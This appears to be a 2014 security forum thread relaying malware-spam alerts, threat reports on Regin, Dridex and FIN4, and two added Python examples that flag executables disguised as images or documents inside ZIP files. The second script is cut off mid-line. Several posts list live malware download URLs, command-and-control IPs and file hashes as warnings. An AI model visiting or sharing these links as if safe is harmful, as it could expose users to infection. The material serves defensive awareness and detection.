... the originating IP address is actually 123.239.58.103 in Delhi, sent via 198.20.245.154 [eas.easylhost .com] in the US... give it a very wide berth.
___

Fake 'my new photo' SPAM - malware - Google’s webp images
- http://myonlinesecurity.co.uk/new-photo-malware-googles-webp-images/
22 Nov 2014 - "... a persistent attack by email for some time now. The subject is always “my new photo” or the equivalent in Spanish. Until 2 days ago the -zip- attached to the email just contained a single malware file which is generally identified as Androm or Gamarue or Wauchos depending on which antivirus you have installed. It obviously takes a few hours or even a day or more for the antivirus companies to catch up with new versions so some users get infected. Over the last few days there has been a change in delivery methods. Along with the “normal” executable file there is what appears to be a standard jpg that won’t display natively in Windows Explorer or in the majority of imaging/photo editing/viewing programs. It will display in Chrome browser. Looking at the file headers, the image is a genuine image but is the “new” webp format from Google https ://developers.google .com/speed/webp/ which needs a codec from Google to display in Windows Explorer or a plug in to display or use in common image editing/viewing programs. We will almost certainly see requests or comments in various forums or facebook or other tech help sites. It is believed that if a user “accidentally” or otherwise runs the exe file then the image is displayed in the browser (if Chrome is default) or the Google plugin or codec has been installed and the user thinks that it was just an image and not a malware file. Of course the .exe file has the extension hidden by default and the icon suggests it is a jpg image file which makes the unwary more likely to click on it and consequently become infected. I have been charting the progress of this malware for some time now, since it first appeared at the end of August... we do see quite a few posts saying that the user cannot see the jpg image in an email or on a webpage in IE, FF etc but it -does- in Chrome OR why they cannot view or edit a downloaded jpg.
The zip file contains 2 files - 1 is a standard .exe with an icon that looks like a jpg that if you don’t have show hidden extensions shown can confuse a user and lead to infection when clicked on... If you open the image files in a hex editor or analysis program you will see the file type headers information:
for jpg they are ……JFIF…..`.`……Exif..MM
for PNG they are .PNG……..IHDR……………g…..sRGB………gAMA……a…..pHYs……….
For Webp they are RIFFhs..WEBPVP8 "
(Comparison example images shown at the URL at the top.)

:fear: :spider: :mad:
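The post above makes its point with raw file headers: a file's real type is in its first bytes, not in its name or icon, which is also why the "spoofed icon" .exe files in the fax and voicemail posts fool people with extensions hidden. The script below is an added example, not code from the forum or from myonlinesecurity.co.uk. It builds a small zip in memory that imitates the "my new photo" lure (the member names and contents are constructed, not a real sample), then compares each member's declared extension with the magic bytes actually present. The JPEG, PNG, WebP and MZ signatures are public format facts; everything else (function names, the zip layout) is the example's own.

```python
import io
import os
import struct
import zipfile

# Public magic-number checks on the first 16 bytes of a file.
def _is_jpeg(h):
    return h[:3] == b"\xff\xd8\xff"            # SOI marker; "JFIF"/"Exif" follows at offset 6

def _is_png(h):
    return h[:8] == b"\x89PNG\r\n\x1a\n"        # PNG signature, then the IHDR chunk

def _is_webp(h):
    # RIFF container: "RIFF" <le32 size> "WEBP" <chunk such as "VP8 ", "VP8L", "VP8X">
    return h[:4] == b"RIFF" and h[8:12] == b"WEBP"

def _is_pe(h):
    return h[:2] == b"MZ"                      # DOS header of a Windows executable

SIGNATURES = [("jpeg", _is_jpeg), ("png", _is_png), ("webp", _is_webp), ("exe", _is_pe)]

# What the filename claims the content is; .scr is a PE file with a different name.
EXTENSION_KINDS = {".jpg": "jpeg", ".jpeg": "jpeg", ".png": "png", ".webp": "webp",
                   ".exe": "exe", ".scr": "exe"}

def sniff(data):
    """Return the content type implied by the leading bytes, or 'unknown'."""
    head = data[:16]
    for kind, check in SIGNATURES:
        if check(head):
            return kind
    return "unknown"

def declared_kind(name):
    """Return the content type implied by the filename extension, or 'unknown'."""
    return EXTENSION_KINDS.get(os.path.splitext(name)[1].lower(), "unknown")

def audit_zip(zip_bytes):
    """Return (member, declared, actual, verdict) for every file inside the archive."""
    findings = []
    with zipfile.ZipFile(io.BytesIO(zip_bytes)) as zf:
        for info in zf.infolist():
            if info.is_dir():
                continue
            data = zf.read(info.filename)  # members are tiny here; cap the read in a real tool
            actual = sniff(data)
            declared = declared_kind(info.filename)
            if actual == "exe":
                verdict = "executable"     # flag PE content whatever the name says
            elif actual != declared:
                verdict = "mismatch"       # e.g. WebP bytes carrying a .jpg name
            else:
                verdict = "ok"
            findings.append((info.filename, declared, actual, verdict))
    return findings

def build_sample_zip():
    """Constructed stand-in for the lure's zip: a WebP named .jpg plus a PE stub."""
    jpeg = b"\xff\xd8\xff\xe0\x00\x10JFIF\x00\x01\x01\x00" + b"\x00" * 8
    png = b"\x89PNG\r\n\x1a\n\x00\x00\x00\rIHDR" + b"\x00" * 13
    webp_body = b"WEBPVP8 " + b"\x00" * 8
    webp = b"RIFF" + struct.pack("<I", len(webp_body)) + webp_body
    pe_stub = b"MZ\x90\x00" + b"\x00" * 60    # DOS header only, not an executable program
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        zf.writestr("my new photo.jpg", webp)   # "image that won't open" from the post
        zf.writestr("my new photo.exe", pe_stub)
        zf.writestr("real.png", png)
        zf.writestr("real.jpg", jpeg)
    return buf.getvalue()

if __name__ == "__main__":
    for member, declared, actual, verdict in audit_zip(build_sample_zip()):
        print(f"{member:24} claims {declared:7} is {actual:7} -> {verdict}")
```

Running it shows the .jpg member reported as WebP (the reason ordinary viewers fail on it) and the .exe member reported as executable regardless of what Explorer would display; the same content check works on mail-gateway attachments without relying on "show known file extensions" being enabled on the desktop.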

AplusWebMaster
2014-11-24, 19:00
FYI...

RFID Payment Cards Hack possible with Android App
- http://blog.trendmicro.com/trendlabs-security-intelligence/hacking-rfid-payment-cards-made-possible-with-android-app/
Nov 24, 2014 - "... high-risk Android app detected as ANDROIDOS_STIP.A in Chile. This app, found distributed through forums and blogs, can be used to hack into the user’s RFID bus transit card to recharge the credits... Paying via RFID cards is becoming more popular nowadays as more mobile devices add NFC support. Banks, merchants or public services issue RFID cards to their customers with prepaid credits... Using widely available tools, the attacker cracked the card’s authentication key. With the cracked key and the native NFC support in Android and the device, cloning a card and adding credits can be easily implemented in a mobile app... These particular MIFARE models were discontinued years ago and supplemented with more secure models. However, it appears that card issuers have opted for cheaper solutions which put their customers at risk...
> http://blog.trendmicro.com/trendlabs-security-intelligence/good-nfc-habits/
We recommend customers take steps to protect RFID cards in their possession. They should also periodically check the balances of their accounts as well. In addition, if possible, they should check if any cards they are currently using are vulnerable and report these to their providers. RFID/NFC attacks are a well-known risk..."
> http://blog.trendmicro.com/trendlabs-security-intelligence/safe-nfc-for-businesses/
___

Fake MyFax SPAM - poorly-detected malware
- http://blog.dynamoo.com/2014/11/myfax-message-from-unknown-spam-leads.html
24 Nov 2014 - "Fax spam again... This spam appears to come from the person receiving it (which is an old trick).
From: victim@ victimdomain .com
Sent: 24 November 2014 15:31
To: norep.c@ mefax .com
Subject: MyFax message from "unknown" - 3 page(s)
Fax Message [Caller-ID: 1-407-067-7356]
http ://159593 .webhosting58 .1blu .de/messages/get_message.php
You have received a 3 page fax at Mon, 24 Nov 2014 15:31:23 +0000.
* The reference number for this fax is chd_did11-14186364797-10847113200-628.
View this fax using your PDF reader.
Thank you for using the MyFax service!

The link in the message downloads a file faxmessage_7241_pdf61.zip which in turn contains a malicious executable faxmessage_7241_pdf.exe which has a VirusTotal detection rate of 4/53*... connects to the following URLs:
http ://95.211.199.37 :16792/2411us3/HOME/0/51-SP3/0/
http ://95.211.199.37 :16792/2411us3/HOME/1/0/0/
http ://lasuruguayas .com/images/refus3.pnk
A file EXE1.EXE is also dropped, with a VirusTotal detection rate of just 1/54**..."
* https://www.virustotal.com/en/file/bb34a977009276411c1eafa8a60d553c8ea847d32cc6071710eff6b743269e91/analysis/1416846678/

** https://www.virustotal.com/en/file/78eeb34989ac134081e005e076a46675cd0d2b4da552b4e6fe7e388489cde550/analysis/1416846980/

95.211.199.37: https://www.virustotal.com/en/ip-address/95.211.199.37/information/

199.26.87.212: https://www.virustotal.com/en/ip-address/199.26.87.212/information/
___

Regin: spy tool
- http://www.symantec.com/connect/blogs/regin-top-tier-espionage-tool-enables-stealthy-surveillance
Updated: 24 Nov 2014 - "... A back door-type Trojan, Regin is a complex piece of malware whose structure displays a degree of technical competence rarely seen. Customizable with an extensive range of capabilities depending on the target, it provides its controllers with a powerful framework for mass surveillance and has been used in spying operations against government organizations, infrastructure operators, businesses, researchers, and private individuals...
Regin’s five stages:
> http://www.symantec.com/connect/sites/default/files/users/user-1013431/fig1-architecture.png
... Almost half of all infections targeted private individuals and small businesses. Attacks on telecoms companies appear to be designed to gain access to calls being routed through their infrastructure.
Confirmed Regin infections by sector:
> http://www.symantec.com/connect/sites/default/files/users/user-1013431/fig2-sectors.png
The discovery of Regin highlights how significant investments continue to be made into the development of tools for use in intelligence gathering. Symantec believes that many components of Regin remain undiscovered and additional functionality and versions may exist..."
> http://www.symantec.com/security_response/writeup.jsp?docid=2013-121221-3645-99

- http://community.websense.com/blogs/securitylabs/archive/2014/11/24/what-protection-can-be-offered-from-sophisticated-malware-such-as-regin.aspx
24 Nov 2014
___

Avast AV can't handle Windows fixes ??
- http://www.theregister.co.uk/2014/11/24/you_stupid_brick_pcs_running_avast_av_cant_handle_windows_fixes/
24 Nov 2014 - "Security software outfit Avast are trying to figure out why the combination of recent Windows patches and updates to the latter company's software are breaking PCs. Hordes of users have found that their PCs, especially those running Windows 8 and 8.1, grind to a halt after they apply both Microsoft's recent KB3000850 update rollup and Avast's latest automatic updates. Some users report their PCs won't boot, or take forever to apply patches... Avast forums*... Microsoft's not immune either: a Redmond thread titled Major issues with KB3000850 includes plenty of people wondering why the company issued an update incompatible with third-party software**. That criticism may not be entirely fair, as an Avast staffer has posted the following explanation for the mess:
'We have been able to simulate the problem in our lab and I think we fixed this issue. This Windows updates calls new memory related functions which are not fully compatible with Avast' ... Whatever the cause, a fair few people are rather upset with both Avast and Microsoft, with the latter company most often felt to be in the wrong..."
* https://forum.avast.com/index.php?topic=160717.0

** http://answers.microsoft.com/en-us/windows/forum/windows8_1-windows_update/major-issues-with-kb3000850/5cb4cddd-52da-44af-9fd5-3ae1a72b0b1a
___

FTC Obtains Court Orders Temporarily Shutting Down Massive Tech Support Scams
FTC, State of Florida Charge Companies Bilked $120 Million from Consumers for Bogus Software and Tech Support Service
- http://www.ftc.gov/news-events/press-releases/2014/11/ftc-obtains-court-orders-temporarily-shutting-down-massive-tech
Nov 19, 2014 - "At the request of the Federal Trade Commission and the State of Florida, a federal court has temporarily shut down two massive telemarketing operations that conned tens of thousands of consumers out of more than $120 million by deceptively marketing computer software and tech support services. The orders also temporarily freeze the defendants’ assets and place the businesses under the control of a court-appointed receiver. According to complaints filed by the FTC, since at least 2012, the defendants have used software designed to trick consumers into thinking there are problems with their computers, then subjected those consumers to high-pressure deceptive sales pitches for tech support products and services to fix their non-existent computer problems... In this latest action, the FTC and the State of Florida have filed two separate cases against companies who allegedly sold the -bogus- software and the deceptive telemarketing operators who allegedly sold -needless- tech support services:
- In the first case, the defendants selling software include PC Cleaner Inc.; Netcom3 Global Inc.; Netcom3 Inc., also doing business as Netcom3 Software Inc.; and Cashier Myricks, Jr. The telemarketing defendants include Inbound Call Experts LLC; Advanced Tech Supportco. LLC; PC Vitalware LLC; Super PC Support LLC; Robert D. Deignan, Paul M. Herdsman, and Justin M. Wright.
- In the second case, the defendants selling software include Boost Software Inc. and Amit Mehta, and the telemarketing defendants include Vast Tech Support LLC, also doing business as OMG Tech Help, OMG Total Protection, OMG Back Up, downloadsoftware.com, and softwaresupport.com; OMG Tech Help LLC; Success Capital LLC; Jon Paul Holdings LLC; Elliot Loewenstern; Jon-Paul Vasta; and Mark Donahue.
According to the FTC’s complaints, each scam starts with computer software that purports to enhance the security or performance of consumers’ computers. Typically, consumers download a free trial version of software that runs a computer system scan. The defendants’ software scan always identifies numerous errors on consumers’ computers, regardless of whether the computer has any performance problems..."

:fear::fear:

AplusWebMaster
2014-11-25, 16:29
FYI...

What the heck is with 104.152.215.0/25?
- http://blog.dynamoo.com/2014/11/what-heck-is-with-104152215025.html
25 Nov 2014 - "A contact gave me the heads up to an exploit-kit running on 104.152.215.90* [virustotal] which appears to be using MS14-064** among other things. 104.152.215.90 belongs to Query Foundry LLC in Wyoming, however they suballocated it to a customer... The random structure of most of the domains is an indicator of possible maliciousness. The few domains that don't meet this pattern seem to be .fr domains which look like they have been hijacked or re-registered... and oddly they are all registered to different (often obviously fake) people at the same address in France... not much data about the range, there are a couple of domains that are also flagged as malicious:
sxzav .xyz [Google diagnostics]: http://www.google.com/safebrowsing/diagnostic?site=sxzav.xyz
klioz .xyz [Google diagnostics]: http://www.google.com/safebrowsing/diagnostic?site=klioz.xyz
... there is enough evidence to treat 104.152.215.0/25 as a suspect network. It does not appear to have any legitimate sites, the sites that do exist are of an unknown purpose and often have apparently fake WHOIS details for the domains. Blocking or monitoring for traffic to and from that /25 is the easiest way of doing it..."
* https://www.virustotal.com/en/ip-address/104.152.215.90/information/

** https://technet.microsoft.com/en-us/library/security/ms14-064.aspx

*** http://urlquery.net/report.php?id=1416802220951
___

Fake 'my photo' SPAM - new trojan variant
- http://blog.mxlab.eu/2014/11/25/latest-my-photo-email-contains-new-trojan-variant/
Nov 25, 2014 - "... intercepted a new trojan distribution campaign by email with the subject “my photo”.
This email is sent from a spoofed address and has the following body:

my new photo :)

The attached file my_iphone_photo.zip contains the folder with the 54 kB large file 1my_photo.exe and the 30 kB large file 2my_photo.jpg. The trojan is known as a variant of MSIL/Injector.GMB, UDS:DangerousObject.Multi.Generic, Trojan.MSIL.BVXGen or Win32.Trojan.Inject.Auto. At the time of writing, 4 of the 54 AV engines did detect the trojan at Virus Total*..."
* https://www.virustotal.com/en/file/28993a2effd007e5d6c5453f61268c37c94c8d666156d0ebcae2e4dca004dcff/analysis/1416912927/

:fear: :mad:

AplusWebMaster
2014-11-27, 05:17
FYI...

QuickBooks Payment Overdue Spam
- http://threattrack.tumblr.com/post/103653348923/quickbooks-payment-overdue-spam
Nov 26, 2014 - "Subjects Seen:
Payment Overdue
Typical e-mail details:
Please find attached your invoices for the past months. Remit the payment by 07/22/2014 as outlines under our “Payment Terms” agreement.
Thank you for your business,
Sincerely,
Lucio Gee
This e-mail has been sent from an automated system. PLEASE DO NOT REPLY.

Malicious File Name and MD5:
Invoice_[-var=partorderb].zip (A3374A3639D4F8EBF105B8FFA1ACB4D1)
Invoice_0128648.scr (08AEA8B75143DC788A52568E823DD10E)

Screenshot: https://gs1.wac.edgecastcdn.net/8019B6/data.tumblr.com/1856c0ee3c8aea258ec44e55795007bc/tumblr_inline_nfnt72zuuJ1r6pupn.png

Tagged: QuickBooks, Upatre

:fear::fear:

AplusWebMaster
2014-11-27, 15:35
FYI...

Fake HMRC SPAM - fake PDF malware
- http://myonlinesecurity.co.uk/hmrc-taxes-application-reference-68j9-wdwk-1nmj-p0za-received-fake-pdf-malware/
27 Nov 2014 - "'HMRC taxes application with reference 68J9 WDWK 1NMJ P0ZA received' pretending to come from noreply@ taxreg.hmrc .gov.uk with a zip attachment is another one from the current bot runs which try to download various Trojans and password stealers especially banking credential stealers, which may include cridex, dridex, dyreza and various Zbots, cryptolocker, ransomware and loads of other malware on your computer. They are using email addresses and subjects that will entice a user to read the email and open the attachment... The email looks like:
The application with reference number 68J9 WDWK 1NMJ P0ZA submitted by you or your agent to register for HM Revenue & Customs (HMRC) taxes has been received and will now be verified. HMRC will contact you if further information is needed.
The original of this email was scanned for viruses by the Government Secure Intranet virus scanning service supplied by Vodafone in partnership with Symantec. (CCTM Certificate Number 2009/09/0052.) On leaving the GSi this email was certified virus free.
Communications via the GSi may be automatically logged, monitored and/or recorded for legal purposes.

27 November 2014: HM Revenue & Customs – TAX.zip: Extracts to: HM Revenue & Customs – TAX.scr
Current Virus total detections: 2/56* (same malware as THIS**). This is another one of the spoofed icon files that unless you have “show known file extensions enabled“, will look like a proper PDF file instead of the .exe file it really is, so making it much more likely for you to accidentally open it and be infected..."
* https://www.virustotal.com/en/file/580df36f77762a526dced5127ae216a057314bea0b80e92e239db41f8a4f46b0/analysis/1417085413/
... Behavioural information
TCP connections
95.211.199.37: https://www.virustotal.com/en/ip-address/95.211.199.37/information/
83.125.22.167: https://www.virustotal.com/en/ip-address/83.125.22.167/information/

** http://myonlinesecurity.co.uk/info-santanderbillpayment-co-uk-fake-pdf-malware/
___

Tainted network: Crissic Solutions (167.160.160.0/19)
- http://blog.dynamoo.com/2014/11/tainted-network-crissic-solutions.html
27 Nov 2014 - "Several IPs hosted on the Crissic Solutions range of 167.160.160.0/19 (suballocated from QuadraNet) have been hosting exploit kits in the past few days, leading to Cryptolocker and other nastiness. I analysed over 1500 sites hosted in the Crissic IP address range... and many sites were already marked as being -malicious- by Google, and some other sites obviously follow the same naming pattern and must be considered as malicious... Given the concentration of active malicious servers in 167.160.165.0/24 and 167.160.166.0/24 then I would recommend -blocking- your traffic to those ranges at least temporarily, despite there being legitimate sites in that range. You might choose to block the entire /19 of course, I will leave you to look at the evidence..."
(More detail at the dynamoo URL above.)

:fear: :mad:

AplusWebMaster
2014-11-28, 14:47
FYI...

Black Friday: deal or no deal
- https://blog.malwarebytes.org/online-security/2014/11/black-friday-deal-or-no-deal/
Nov 27, 2014 - "... Spammers and scammers have risen to the occasion with deals that are too good to be true such as in this example for -fake- Gucci products. This was reported in a Tweet by Denis Sinegubko, from Unmask Parasites*
* http://www.unmaskparasites.com/ -- https://twitter.com/unmaskparasites
'Denis @unmaskparasites - Chinese spammers are ready for Black Friday. Found these domains in code on a hacked site: GucciBlackFridays .com, BlackFridayCDN .com'
... and also a security researcher at Sucuri** -- http://sucuri.net/ -- http://blog.sucuri.net/2014/11
The site boasts incredible prices on normally very expensive merchandise... Shoppers might get fooled by the security badges and stamps, which of course are only here for show... Traffic to these -bogus- sites will come from spam or, as in this case, from compromised websites... This code resides on the compromised server and performs different checks, in particular whether the user visiting the page is real or a search engine... When Black Friday is over, the crooks will be ready to serve you special deals for Cyber Monday... There certainly are good deals to be made during this holiday season but you really ought to be careful what you click on. You might order counterfeit goods or have your banking credentials stolen and money depleted..."
(More detail at the malwarebytes URL above.)

- https://blog.malwarebytes.org/online-security/2014/11/black-friday-and-cyber-monday-online-shopping-made-safer/
Nov 24, 2014

- http://www.trendmicro.com/vinfo/us/security/news/mobile-safety/a-guide-to-avoiding-cyber-monday-scams-on-mobile
Nov 24, 2014

- http://www.trendmicro.com/vinfo/us/security/news/cybercrime-and-digital-threats/staying-safe-from-online-threats-this-thanksgiving
Nov 21, 2014
___

Lots of Black Friday SPAM & Phishing
- https://isc.sans.edu/diary.html?storyid=19003
2014-11-28 23:20:46 UTC - "Likely every reader out there, their friends and family, even their pets with email accounts, have received Black Friday SPAM or phishing attempts today. Our own Dr. J sent the handlers an Amazon sample for 'One Click Black Friday Rewards'.
Of course, that one click goes -nowhere- near Amazon and directs you to the likes of Black Fiday (yes, it's misspelled) at hXXp ://www.jasbuyersnet .com/cadillac/umbered/sedatest/styes/coleuses/unterrified.htm. Can't speak to the payload there, don't bother, just use it as ammo for heightened awareness and safe shopping online during these holidays, and...well, all the time. Be careful out there. :-)
Cheers and happy holidays."
___

Best Buy Order Spam
- http://threattrack.tumblr.com/post/103809164928/best-buy-order-spam
Nov 28, 2014 - "Subjects Seen:
Details of Your Order From Best Buy
Typical e-mail details:
E-shop Best Buy has received an order addressed to you which has to be confirmed by the recipient within 4 days.
Upon confirmation you may pick it in any nearest store of Best Buy.
Detailed order information is attached to the letter.
Wishing you Happy Thanksgiving!
Best Buy

Malicious File Name and MD5:
BestBuy_Order.exe (bff17aecb3cc9b0281275f801026b75d)

Screenshot: https://gs1.wac.edgecastcdn.net/8019B6/data.tumblr.com/8d119ffd996422b655f2ff200a50953b/tumblr_inline_nfrayxzYyG1r6pupn.jpg

Tagged: Best Buy, Kuluoz

:fear::fear: :mad:

AplusWebMaster
2014-12-01, 21:33
FYI...

Dridex Phish uses malicious word docs
- https://isc.sans.edu/diary.html?storyid=19011
2014-12-01 - "... During the past few months, Botnet-based campaigns have sent waves of phishing emails associated with Dridex... The emails contained malicious Word documents, and with macros enabled, these documents -infected- Windows computers with Dridex malware. Various people have posted about Dridex [1] [2], and some sites like Dynamoo's blog and TechHelpList... often report on these and other phishing campaigns... On 11 Nov 2014, I saw at least 60 emails with 'Duplicate Payment Received' in the subject line. This appeared to be a botnet-based campaign from compromised hosts at various locations across the globe... Monitoring the infection traffic on Security Onion, we found alerts for Dridex traffic from the EmergingThreats signature set (ET TROJAN Dridex POST Checkin) [3]... File hashes changed during this wave of emails, indicating at least 3 different Word documents were used. During this phishing run, Dridex malware came from IP addresses in the 62.76.185.0/24 block..."
[1] http://stopmalvertising.com/malware-reports/analysis-of-dridex-cridex-feodo-bugat.html

[2] http://www.abuse.ch/?p=8332

[3] https://isc.sans.edu/diaryimages/images/brad5.png

[4] http://doc.emergingthreats.net/2019478

62.76.185.127: https://www.virustotal.com/en/ip-address/62.76.185.127/information/
___

Fake 'New offer Job' SPAM - PDF malware
- http://myonlinesecurity.co.uk/new-offer-job-fake-pdf-malware/
1 Dec 2014 - "'New offer Job' with a zip attachment pretending to come from Job service <billiond8@ greatest3threeisland .com> is another one from the current bot runs which try to download various Trojans and password stealers especially banking credential stealers, which may include cridex, dridex, dyreza and various Zbots, cryptolocker, ransomware and loads of other malware on your computer. They are using email addresses and subjects that will entice a user to read the email and open the attachment... The email looks like:
New offer for you, see attached here.

There is also a version around with the subject of 'Tiket alert' pretending to come from FBR service <newspaperedixv@ greatest3threeisland .com>
Look at the attached file for more information.
Assistant Vice President, FBR service
Management Corporation

Both emails contain the same malware as does today’s version of 'my new photo malware'*
1 December 2014 : tiket.zip: Extracts to: tiket.exe
Current Virus total detections: 5/19**. This is another one of the spoofed icon files that unless you have “show known file extensions enabled“, will look like a proper PDF file instead of the .exe file it really is, so making it much more likely for you to accidentally open it and be infected... The basic rule is NEVER open any attachment to an email, unless you are expecting it..."
* http://myonlinesecurity.co.uk/new-photo-malware/

** https://www.virustotal.com/en/file/3baa6154cae386bd89d4fce302adad6b5085cac01bcbe03c4fc709ee5173f07e/analysis/1417475226/
___

Phishing scam that hit Wall Street might work against you
- http://arstechnica.com/security/2014/12/phishing-scam-that-penetrated-wall-street-just-might-work-against-you-too/
Dec 1 2014 - "Researchers have uncovered a group of Wall Street-savvy hacks that have penetrated the e-mail accounts of more than 100 companies, a feat that has allowed them to obtain highly valuable plans concerning corporate acquisitions and other insider information.
> http://cdn.arstechnica.net/wp-content/uploads/2014/12/outlook-phish-640x359.jpg
FIN4, as the group is known, relies on a set of extremely simple tactics that in many cases has allowed them to remain undetected since at least the middle of 2013, according to a report published Monday from security firm FireEye*. Members boast a strong command of the English language and knowledge of corporate finance and Fortune 500 culture. They use that savvy to send highly targeted spearphishing e-mails that harvest login credentials for Microsoft Outlook accounts. The group then uses compromised accounts of one employee, customer, or partner to send spearphishing e-mails to other company insiders. At times, the attackers will -inject- a malicious message into an ongoing e-mail discussion among multiple people, furthering their chances of success. E-mails are sent from the accounts of people the target knows, and they discuss mergers, acquisitions, or other topics already in progress. The attackers often bcc other recipients to make it more difficult to detect the malicious e-mail. The messages appear to be written by native English speakers and often contain previously exchanged Microsoft Office documents that embed hidden malicious macros. This results in fraudulent e-mails that are extremely hard to detect, even by some people who have been trained to spot such phishing campaigns... FireEye researchers said FIN4 members have compromised the accounts of C-level executives, legal counsel, regulatory and compliance personnel, scientists, and advisors of more than 100 companies. About 80 of them are publicly traded companies, while the remaining 20 are Wall Street firms that advise corporations on legal or securities matters or possible or pending mergers and acquisitions. As a result, the group stood to make a windfall if it used the insider information to buy or sell stocks before the information became widely known... 
Embedded in the previously stolen documents are Visual Basic Applications (VBA) macros that prompt readers to enter the Outlook user names and passwords. The scripts then funnel the credentials to servers controlled by the attackers. In other, earlier cases, the spearphishing e-mails contained links to fake Outlook Web App login pages that prompted visitors to enter their passwords. Some of the attacks FireEye observed targeted multiple parties inside law firms, consultancies, and corporations as they discussed particular pending business deals. In one instance, attackers used previously acquired access to e-mail accounts at an advisory firm to harvest information being exchanged about an acquisition under consideration involving one of its clients... the best thing any potential target can do is to educate employees how to spot phishing attacks. The FIN4 attackers have just raised the bar, so chances are most education programs should be revised to help employees spot these new and improved tactics."
* https://www.fireeye.com/blog/threat-research/2014/11/fin4_stealing_insid.html

- http://www.reuters.com/video/2014/12/02/cyber-spies-steal-corporate-secrets-to-r?videoId=347691634
Dec 01, 2014
Video: 02:09

- http://www.computerworld.com/article/2853697/fireeye-suspects-fin4-hackers-are-americans-after-insider-info-to-game-stock-market.html
Dec 1, 2014
> http://core0.staticworld.net/images/article/2014/12/fin4-targets-100533260-large.idge.jpg

- http://www.theregister.co.uk/2014/12/02/malware_raids_stock_markets/
2 Dec 2014
> http://regmedia.co.uk/2014/12/02/11223.png
___

Europol and US customs seize 292 domains selling counterfeit goods
- http://www.theinquirer.net/inquirer/news/2384329/europol-and-us-customs-seize-292-domains-selling-counterfeit-goods
Dec 1, 2014 - "... Interpol in conjunction with US Immigration and Customs Enforcement has seized the domains of almost 300 websites that were selling counterfeit merchandise. The law enforcement agencies, not to mention politicians, are concerned that citizens are being taken for mugs online and cannot resist spending good money on fake rubbish... Europol said that the seizures involved 25 law enforcement agencies from 19 countries and participation from the US National Intellectual Property Rights Coordination Center... The websites offered a mix of content, ranging from luxury goods and sportswear to CDs and DVDs. The domains are now in the hands of the national governments involved in the shutdowns, and the gear is presumably facing some sort of immolation. Operation In Our Sites has closed down 1,829 domains so far..."
___

O/S Market Share - Nov 2014
- http://www.netmarketshare.com/operating-system-market-share.aspx?qprid=10&qpcustomd=0

Browser Market Share - Nov 2014
- http://www.netmarketshare.com/browser-market-share.aspx?qprid=0&qpcustomd=0
___

PoS Malware 'd4re|dev1|' attacking Ticket Machines and Electronic Kiosks
- https://www.intelcrawler.com/news-24
Nov 26, 2014 - "... new type of Point-of-Sale malware called “d4re|dev1|”. This new strain of malware, which is hitting Mass Transit Systems, acts as an advanced backdoor with remote administration, having RAM scraping and keylogging features. This new POS malware find adds to a growing list of POS variants being developed by underground cyber criminals because of the high ROI when they hit payloads like a Target or Home Depot. Variants recently identified and profiled by IntelCrawler include POSCLOUD, Nemanja, JackPOS, BlackPOS, and Decebal. The exploitation of merchants is taking place on a global scale as outlined by the IntelCrawler POS infection map*.
* https://www.intelcrawler.com/analytics/pmim
... The malware has a “File Upload” option, which can be used for remote payload updating. The process of malware was masked under “PGTerm.exe” or “hkcmd.exe”, as well as legitimate names of software such as Google Chrome. Adversaries use this option for the installation of additional backdoors and tools, which allows them to avoid infrastructure limitations and security policies designed for detection. This broad lateral approach shows that serious cybercriminals are not interested in just one particular Point-of-Sale terminal – they are looking for enterprise wide network environments, having tens of connected devices accepting payments and returning larger sets of spoils to their C2 servers... As this POS malware market is evolving, new security measures are needed to combat the seemingly continuous strains being developed by the underground. In addition to consulting your PCI vendor, IntelCrawler strongly recommends to encapsulate any administration channels to the -VPN- as well as to limit the software environment for operators, using proper access control lists and updated security policies..."

:fear: :mad:
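The posts above keep describing the same attachment pattern: a ZIP holding a .scr or .exe with a PDF-style icon, or a double extension like 'Label_00486182.doc.js'. This added example (not code from any of the quoted blogs) inspects a ZIP the way a mail gateway could, checking both the member's extension and its first bytes; the archives and the 'MZ' stand-in payloads are constructed in memory, not real binaries.

```python
"""Inspect a ZIP e-mail attachment for the disguised-executable pattern.

Added example for this thread, not code from any of the quoted blogs.
The ZIP files are constructed in memory; the 'executable' members are
a few bytes beginning with the DOS 'MZ' signature, not real programs.
"""
import io
import zipfile

# Extensions Windows runs directly on double-click (a subset).
EXEC_EXTENSIONS = {"exe", "scr", "pif", "com", "bat", "cmd", "js", "jse", "vbs", "wsf"}
# Extensions users expect to be harmless documents or images.
DOCUMENT_EXTENSIONS = {"pdf", "doc", "docx", "jpg", "png", "txt"}


def classify_member(name: str, head: bytes) -> list[str]:
    """Return findings for one archive member given its name and first bytes."""
    findings = []
    parts = name.rsplit("/", 1)[-1].lower().split(".")
    exts = parts[1:]  # every extension after the first dot
    if exts and exts[-1] in EXEC_EXTENSIONS:
        findings.append(f"executable extension .{exts[-1]}")
    if len(exts) >= 2 and exts[-2] in DOCUMENT_EXTENSIONS and exts[-1] in EXEC_EXTENSIONS:
        findings.append(f"double extension .{exts[-2]}.{exts[-1]}")
    if head.startswith(b"MZ"):
        findings.append("PE/DOS 'MZ' header")
        if exts and exts[-1] in DOCUMENT_EXTENSIONS:
            # A renamed executable: the content, not the name, gives it away.
            findings.append("MZ header under document extension")
    return findings


def inspect_zip(data: bytes) -> dict[str, list[str]]:
    """Map each member name to its findings; an empty list means nothing suspicious."""
    report = {}
    with zipfile.ZipFile(io.BytesIO(data)) as zf:
        for info in zf.infolist():
            if info.is_dir():
                continue
            with zf.open(info) as fh:
                head = fh.read(4)
            report[info.filename] = classify_member(info.filename, head)
    return report


def is_suspicious(data: bytes) -> bool:
    """True when any member of the archive produced a finding."""
    return any(findings for findings in inspect_zip(data).values())


def build_sample(members: dict[str, bytes]) -> bytes:
    """Build an in-memory ZIP from name -> content (constructed test data)."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as zf:
        for name, content in members.items():
            zf.writestr(name, content)
    return buf.getvalue()


FAKE_PE = b"MZ\x90\x00" + b"\x00" * 60  # constructed stand-in, not a real binary

# Constructed samples modelled on the attachments named in the posts above.
SAMPLE_HMRC = build_sample({"HM Revenue & Customs - TAX.scr": FAKE_PE})
SAMPLE_PHOTO = build_sample({
    "my_iphone_photo/1my_photo.exe": FAKE_PE,
    "my_iphone_photo/2my_photo.jpg": b"\xff\xd8\xff\xe0 jpeg",
})
SAMPLE_BENIGN = build_sample({"invoice.pdf": b"%PDF-1.4 ..."})
SAMPLE_RENAMED = build_sample({"report.pdf": FAKE_PE})  # executable renamed to .pdf

if __name__ == "__main__":
    for label, sample in [("HMRC", SAMPLE_HMRC), ("photo", SAMPLE_PHOTO),
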